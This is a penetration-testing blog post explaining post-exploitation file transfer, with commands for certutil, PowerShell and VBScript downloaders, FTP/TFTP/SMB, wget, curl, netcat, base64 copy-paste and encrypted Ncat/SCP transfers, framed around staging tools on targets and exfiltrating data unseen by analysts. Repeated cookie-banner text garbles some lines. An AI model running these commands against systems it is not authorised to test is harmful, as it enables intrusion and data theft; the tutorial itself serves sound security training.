Search Medium

To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

(Almost) All The Ways to File Transfer

PenTest-duck · Follow
12 min read · Oct 6, 2019

Listen Share

File Transfer — a Crucial Post-Exploitation Procedure

Introduction
File Transfer is a crucial, and in most cases, an inevitable step of Post-
Exploitation. You’ve successfully gained initial access on your target machine,
and with file transfers, you can upload tools on the target to try and elevate your
privileges, exfiltrate sensitive data from the target back to your machine or just
move around files to/from the target and you.

Today, we’ll cover some of the popular (and not popular) ways to file transfer
from our attacker machine (preferrably Kali Linux) to a Windows or Linux target.
I’ll cover how to set up a server on the attacker machine and then show how the
target get download the file and vice versa. At the end, we’ll cover the weaknesses
of plaintext file transfers and demonstrate some encrypted methods of file
transfer.

NOTE: Medium’s formatting makes “e”s that are enclosed in code blocks and are
italicised have a trailing space following it. To show an example: this "file " .

THERE IS NOToSPACE AFTER THE “e”. However, there are some cases where there
make Medium work, we log user data. By using Medium, you agree to
is supposed to
ourbe a space
Privacy Policy, after the
including “e”;policy.
cookie you just have to use your senses :P

Easiest, Most Common File Transfer Method

HTTP
Arguably, the simplest and most convenient method of File Transfer is using
HTTP. You can easily set up a HTTP server on your attacker machine in a specific
directory that you want to be the root of the server, with just one command.

SimpleHTTPServer

SimpleHTTPServer Server

python -m SimpleHTTPServer [port] uses a module in Python called

SimpleHTTPServer, which, as the name suggests, starts up a HTTP Server. It uses
port 8000 by default, but you can change that by specifying the port number at
the end.

There are only 2 very, very minor downsides of SimpleHTTPServer and that is the
fact that (1) when you Ctrl+C to stop the server, it gives you a mess of errors and
(2) this isn’t the shortest command to set up a HTTP server.

http.server
 Http.server Server

To make Medium work, we log user data. By using Medium, you agree to
python3 -m http.server [port] uses a lesser known module in Python 3 called
our Privacy Policy, including cookie policy.
http.server, and it sets up a HTTP server, on port 8000 by default, just like
SimpleHTTPServer. But the advantages of http.server over SimpleHTTPServer
are:
1. You don’t get that mess of errors when you stop the server
2. It’s a shorter, easier to type command
3. Who doesn’t love Python3 ;)

Just one word of warning about HTTP servers is that whatever directory you run
the command in becomes the root directory of the HTTP server, which means
you won’t be able to access files that are lower in the filesystem.

Apache
A longer method to start up a HTTP server, in the case that Python or the
modules are not available on your machine, is by using Apache.

First, move the file you want to transfer to the /var/www/html directory with mv

file /var/www/html/ and start the Apache2 service with service apache2 start . We
can verify that the server is indeed running and serving our file by browsing to
our file in a web browser.
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Apache2 HTTP Server

On the Target…

On the target, for both Windows and Linux, if you have GUI access, you can
simply open up a web browser and download the files you want. For CLI ways to
download files from a HTTP server, check the Windows and Linux sections below
(namely certutil/powershell/vbscript for Windows and wget/curl for Linux).

Windows File Transfer

HTTP
Certutil.exe
Certutil is hands down probably the easiest way to file transfer to a Windows
machine. Certutil.exe is originally meant for certificate and CA management, but
is now abused by attackers as a method of file transfer.

Once you have set up your HTTP server with SimpleHTTPServer, http.server or
Apache, simply run this command on the target:
certutil -urlcache -split -f "http:// ip-addr : port / file " [ output-file ]

To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Certutil HTTP Download

Powershell
Powershell is an advanced version of the standard cmd.exe with scripting
capabilities. It is installed by default in Windows 7 and 2008, and later versions.
You can use a Powershell one-liner to download a file from a HTTP server, like
this:
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port

/file', 'output-file')

One thing to note: you MUST use single quotes for the URL and output file, and
using double quotes will not work (I can tell you this because I spent 10 minutes
trying to figure out why my Powershell command didn’t work).

Powershell HTTP Download

VBScript
VBScript, or Visual Basic Scripting Edition, is another language with which you
can download files with. I generally don’t prefer using VBScript as you need to
individually insert tens of lines of commands into a file to execute (in reality you
would copy paste the commands all at once, but it’s still a hassle), but if your
target is a Windows XP or 2003, you might consider using this method every now
and then.
Here’s the full list of commands (you can find a better-formatted version here):
To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs,
ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>
wget.vbs
echo If http Is Nothing Then Set http =
CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http =
CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http =
CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >>
wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >>
wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,
1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

To run our wget.vbs script, run cscript wget.vbs http://ip-addr:port/file

output-file .
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

VBScript HTTP Download

FTP
Pyftpdlib
FTP is another common method of file transfer, and FTP clients are usually
installed by default on Windows machines. The Python module pyftpdlib allows
you to quickly set up an FTP server, hassle-free. You can install it using sudo apt-

get install python-pyftpdlib as shown below:

Pyftpdlib Installation

Once downloaded, simply set up an FTP server with python -m pyftpdlib [-p

port] . The default port pyftpdlib uses is port 2121. You can also append the
-w option to allow anonymous write, so that the target can anonymously upload
files to the attacker machine.

Pyftpdlib Server
Pure-ftpd To make Medium work, we log user data. By using Medium, you agree to
You can download pure-ftpd
our Privacy withcookie
Policy, including sudopolicy.
apt-get install pure-ftpd

Pure-ftpd Installation

To start the FTP server, run service pure-ftpd start .

Pure-ftpd Server

To verify that the service is indeed running, run service pure-ftpd status . To
close down the server, run service pure-ftpd stop .

On the Target…
Most of the times, the initial shell we gain on the target won’t be interactive,
which means running an interactive command which requires further input from
the user (e.g. text editor, FTP connection) won’t work properly, and can crash the
shell. But FTP requires user interaction, so how do we work around this?

The trick is to create a file with all the FTP commands we need, and run it all at
once. The file creation looks like this:

echo open ip-addr > ftp.txt

echo username >> ftp.txt
 echo password >> ftp.txt
echo binary >> ftp.txt
echo GET To
file.exe
make Medium>>work,ftp.txt
we log user data. By using Medium, you agree to
echo bye our
>>Privacy
ftp.txt
Policy, including cookie policy.

FTP Commands File Creation

We are creating a connection to the attacking machine’s FTP server, with a

username and password (in my case, anonymous login is allowed), to enable
transfer of binary executable files, GET the executable file and close the
connection.

To run this whole file, use ftp -v -n -s:ftp.txt and you will see the commands
being automatically executed.

FTP File Download

TFTP
Atftpd
Atftpd allows a quick setup of a TFTP server in Kali Linux, with just a single
command atftpd --daemon --port 69 root-dir . You must specify the directory
To make Medium work, we log user data. By using Medium, you agree to
that the TFTPourserver
Privacy will
Policy,use as the
including root.
cookie As a side note, TFTP uses UDP as its
policy.

transport layer protocol.

On the Target…
Windows XP and 2003 and earlier have a TFTP client pre-installed, whereas
Windows 7 and 2008 and later need to be specifically installed. However, there
are plenty of use cases for TFTP file transfers.

To download/upload a file, use tftp -i ip-addr {GET | PUT} file .

TFTP Download

SMB
SMB is another convenient file transfer protocol, which is very common amongst
Windows environments. You can easily set up an SMB server with Impacket’s
smbserver.py program like this:
python /usr/share/doc/python-impacket/examples/smbserver.py share-name root-dir .

smbserver.py SMB Server

On the target, you can view the available shares on the SMB server with net view

\\ip-addr . To view the files available in the share, simply use dir \\ip-

addr\share-name .
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

SMB Server Enumeration

To actually download a file, use copy \\ip-addr\share-name\file out-file .

SMB Download

Linux File Transfer

Wget (HTTP/FTP)
Most Linux machines have the wget command pre-installed, so once you have set
up a HTTP server, you can download the file easily with wget http://ip-

addr[:port]/file[-o output-file] .

Wget HTTP Download

A lesser known usage of wget is its ability to download FTP files as well. To do
that, simply prepend a ftp:// before the URL. If the FTP server needs credentials,
specify them with --ftp-user=username and
--ftp-password=pass.
To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Wget FTP Download

One downside of this is that when it downloads an executable file, the file cannot
be executed. Normal FTP server connections have a binary command to allow
executable files to be preserved throughout the transfer, but wget doesn’t support
this.

Curl
Most Linux targets, and OSX machines, have the curl command available out-of-
the-box. Curl is similar to wget in that it provides an easy method of downloading
files from an HTTP server.

Curl HTTP Download

Netcat (Standard TCP/Manual HTTP)

Netcat, being the “swiss army knife of network hacking tools” it is, can also
provide an easy method of file transfers. You can read how Netcat can be
leveraged as a file transfer method using standard TCP connections in my other
post.

Netcat can also be used to manually download files from an HTTP server. You can
nc to a HTTP server and send a GET request for a file. The one-liner is echo "GET

/file HTTP/1.0" | nc -n ip-addr port > out-file && sed -i '1,7d' out-file .

Netcat HTTP Download

We redirect the download output to a file, and use sed to delete the first 7 lines of
To make Medium work, we log user data. By using Medium, you agree to
the file. But why? Since
our Privacy weincluding
Policy, are redirecting
cookie policy.the raw output to the file, the HTTP

GET response header is redirected as well, and if left untouched, can corrupt an
executable file.

Base 64 Encoding + Copy & Paste

Now here’s an interesting one. We won’t be actually transferring a file across a
network, but instead we will be copy-pasting executable files from our attacking
machine to the target. But how can we copy and paste executable files, which are
full of unprintable characters?

The trick is by first encoding the file in Base 64. We can do this by using Python:
python -c 'print(__import__("base64").b64encode(open("file", "rb").read()))' .

Generating a Base 64 of the Executable

Then, on the target, we can copy and paste the string into a .txt file with echo

"string" > output.txt , and use base64 to decode the file, with base64 -d

output.txt > output-file .

 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Decoding the Base 64 File

If Python is available, you can also run python -c 'print(__import__

("base64").b64decode(open("string.txt", "r").read()))' > out-file .

Encrypted & Secure File Transfer

Problems with Plaintext & Benefits of Encrypted File Transfer
The main problem with plaintext file transfers is … that it communicates in
plaintext. Why is this bad? Because anyone can sniff the network and see the file
that is being introduced or exfiltrated, which means certain people like SOC
analysts can detect and see exactly what you are smuggling into the network
and/or out from the network.
Encrypted SCP Download Capture
Here’s a Wireshark capture of a curl http://192.168.1.2:8000
/filetransfer.me to drive the point home.
In this case, we’ve used the Secure Copy Protocol (SCP) to download a file over
SSH. As you can see, you cannot identify what file the attacker tried to upload,
nor its contents — you only see a jumbled mess. This is a much more secure way
to download/upload files to/from the target. Now let’s take a look at how we can
actually achieve encrypted file transfers.

How to Perform Secure File Transfer

The first, and the easier method is to use Ncat. Ncat can create a secure,
encrypted connection over SSL/TLS. You can set up a listener on the target with
ncat -nvlp port --ssl > out-file and connect to the listener from the attacking
machine with ncat -nv target-ip port --ssl < file-to-send .
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Ncat SSL/TLS Download

The second method is to use the Secure Copy Protocol, or SCP, which uses SSH to
securely transfer files. You can start the SSH server easily on your Kali Linux with
service ssh start .

On the target, we need to create a file, line by line, which will enter the SSH
password in, and download the remote file. The only reason that a one-liner
doesn’t work is because SCP prompts the user for a password, and simply echoing
the password and piping it to the command won’t work. The list of commands to
build the file looks like this:

echo '#!/usr/bin/expect' > scp.exp

echo 'spawn scp username@ip-addr:/path-to-file out-file' >>
scp.exp
echo 'set pass "password"' >> scp.exp
Plaintext HTTP Download Capture
echo 'expect {' >> scp.exp
echo 'password: {send "$pass\r"; exp_continue}' >> scp.exp
echo '}' >> scp.exp
Following the HTTP stream shows us the HTTP GET request that was sent (shows
the sending host and user agent [curl]), the file that was requested and the
server’s
To response.
run this file, useAsexpect
you can see, network
scp.exp sniffers
and securely can findthe
download outfile
a lotyou
about the
want.
plaintext communication between you and your target. This is why encrypted
You may need toiscreate
communication a new user for SSH to log into, if so, you can use the
important.
adduser username command and follow the prompt to set up a new user.

Important note: you MUST use single quotes to surround the lines, as using
double quotes will overlap with the double quotes that are included within the
line, and will cause an issue with the first line.
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

SCP Download

Further Digging
Other File Transfer Methods: https://isroot.nl/2018/07/09/post-exploitation-file-
Penetration Testing File Transfer Linux Windows Hacking
transfers-on-windows-the-manual-way/
Certutil.exe: https://docs.microsoft.com/en-us/windows-server/administration
/windows-commands/certutil
Passing the password to SCP: https://stackoverflow.com/questions/
50096/how-to-pass-password-to-scp

Follow

Written by PenTest-duck
279 Followers

Aspiring Next-Generation Penetration Tester

More from PenTest-duck

 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

PenTest-duck

Offensive Msfvenom: From Generating Shellcode to Creating Trojans

Choose & configure payloads, generate shellcode, eliminate badchars, utilise encoders,
reduce the shellcode length and create a Trojan!

10 min read · Oct 4, 2019

129 1
 PenTest-duck

Offensive Netcat/Ncat:
To make Medium work, From
we logPort Scanning
user data. To Bind
By using Medium, Shell
you agree to IP
our Privacy Policy, including cookie policy.
Whitelisting
In this post, we’ll be exploring Netcat’s limitless offensive potentials and a brief look at how
Ncat takes Netcat to the next level

7 min read · Oct 1, 2019

85

PenTest-duck

Bind vs Reverse vs Encrypted Shells — What Should You Use?

What are the pros and cons of bind & reverse shells? Why are encrypted shells so secure?
What tools are there to generate these shells?

5 min read · Oct 2, 2019

136 2
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

PenTest-duck

Offensive Nessus: Installation & Simple Windows Vulnerability

Scanning
Installing Nessus Essentials, Setting up a Custom Scan Policy, Creating a New Scan and
Generating a Report

9 min read · Oct 4, 2019

Recommended
6 from Medium

See all from PenTest-duck

 Jacob Bennett in Level Up Coding

Use Git likeToamake

senior engineer
Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.
Git is a powerful tool that feels great to use when you know how to use it.

· 4 min read · Nov 15, 2022

6.3K 66

Alopix | Αλώπηξ in System Weakness

Bypassing a Windows password using Kali, with just two commands

WARNING! The following instructions shown in this article are for penetration testing
purposes or personal use ONLY.

· 3 min read · Dec 31, 2022

654 9

Lists

General Coding Knowledge

20 stories · 18 saves

Staff Picks
364 stories · 120 saves
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Viktor Mares

Code Injection via Python Sandbox Escape — how I got a shell inside a
network.
Hi Everyone,

· 5 min read · Feb 7

36
 Dr. Derek Austin � in Better Programming

Why I Prefer Regular

To make MediumMerge Commits
work, we log user data. ByOver Squash
using Medium, Commits
you agree to
our Privacy Policy, including cookie policy.
I used to think squash commits were so cool, and then I had to use them all day, every day.
Here’s why you should avoid squash

· 5 min read · Sep 30, 2022

1.1K 51

The PyCoach in Artificial Corner

You’re Using ChatGPT Wrong! Here’s How to Be Ahead of 99% of

ChatGPT Users
Master ChatGPT by learning prompt engineering.

· 7 min read · Mar 17

25K 441
 To make Medium work, we log user data. By using Medium, you agree to
our Privacy Policy, including cookie policy.

Unbecoming

10 Seconds That Ended My 20 Year Marriage

It’s August in Northern Virginia, hot and humid. I still haven’t showered from my morning trail
run. I’m wearing my stay-at-home mom…

· 4 min read · Feb 16, 2022

51K 802

See more recommendations